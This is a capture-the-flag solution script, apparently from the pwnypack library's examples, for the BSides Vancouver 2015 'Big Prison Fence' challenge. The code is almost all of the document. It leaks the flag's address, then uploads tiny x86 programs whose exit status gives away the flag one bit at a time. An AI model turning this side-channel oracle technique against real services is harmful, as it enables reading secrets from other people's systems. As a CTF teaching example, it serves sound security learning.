Big Prison Fence
This example demonstrates how to use pwnypack to capture the flag of the Vancouver BSides CTF 2015 'Big Prison Fence' challenge.
#! /usr/bin/env python
from __future__ import print_function
from pwny import *
# Select 32-bit x86 as pwnypack's global target so that the helpers used
# below (asm(), P32(), U()) follow x86 conventions; the challenge binary
# './bigpf' is driven with an i386 Linux syscall stub further down.
target.arch = Architecture.x86
def leak_byte(offset):
    """Recover one byte of the flag, one bit per run of the challenge binary.

    The service leaks an address in the line it echoes back after the
    ``NAME PROGRAM`` prompt, then executes a caller-supplied machine-code
    blob after ``LOAD PROGRAM``.  Each iteration loads a tiny program that
    tests a single bit of the byte at ``flag_addr + offset`` and reports
    the result through its exit status; whether the service then prints
    ``THANK YOU`` or just drops the connection is used as a 1-bit oracle.

    Args:
        offset: byte index relative to the leaked flag address.

    Returns:
        The recovered byte as a one-character ``str`` (``chr(v)``).

    Raises:
        Whatever ``Flow`` raises on a failed spawn/connect; only
        ``EOFError`` from the final ``until`` is handled here.
    """
    v = 0
    for bit in range(8):
        # Retry loop: a fresh process is started for every bit, and again
        # whenever the echoed line does not have the expected length.
        while True:
            f = Flow.execute('./bigpf')
            # f = Flow.connect_tcp('bigprisonfence.termsec.net', 49782)
            f.until(b'NAME PROGRAM\n')
            f.writeline(b'A' * 32)
            line = f.readline().strip()
            if len(line) != 45:
                # address contained a nul byte, retry.
                f.kill()
                continue
            # The last four bytes of the echoed line are the leaked address
            # (unpacked with the current target's width/endianness).
            flag_addr = U(line[-4:])
            # Probe program: TEST sets ZF when the selected bit of the byte
            # at flag_addr+offset is clear; SETE copies that into BL, and
            # eax=1 / int 0x80 is the i386 Linux exit syscall, so the process
            # exits with status 1 when the bit is clear and 0 when it is set.
            program = asm('''
mov eax, %d
mov ebx, 0
test byte [eax], %d
sete bl
mov eax, 1
int 0x80
''' % (flag_addr + offset, 1 << bit))
            f.until(b'LOAD PROGRAM\n')
            # Length-prefixed upload; echo=False presumably keeps the raw
            # machine code out of the local transcript — verify in Flow docs.
            f.write(P32(len(program)) + program, echo=False)
            try:
                # 'THANK YOU' is taken to mean the bit is set; an EOF instead
                # is taken to mean it is clear.  That mapping assumes the
                # service only prints the banner on a zero exit status —
                # not visible here, confirm against the binary.
                f.until(b'THANK YOU\n')
                v |= 1 << bit
            except EOFError:
                pass
            f.close()
            break
    return chr(v)
# Leak the flag byte by byte until the terminating NUL is reached.
# The previous byte is appended before the next one is fetched, so the
# NUL itself never ends up in `flag`; the first iteration appends ''.
# Each byte costs eight (plus retries) launches of the challenge binary.
flag = c = ''
o = len(flag)
while c != '\0':
    flag += c
    c = leak_byte(o)
    o += 1
print('Here is the flag:', flag)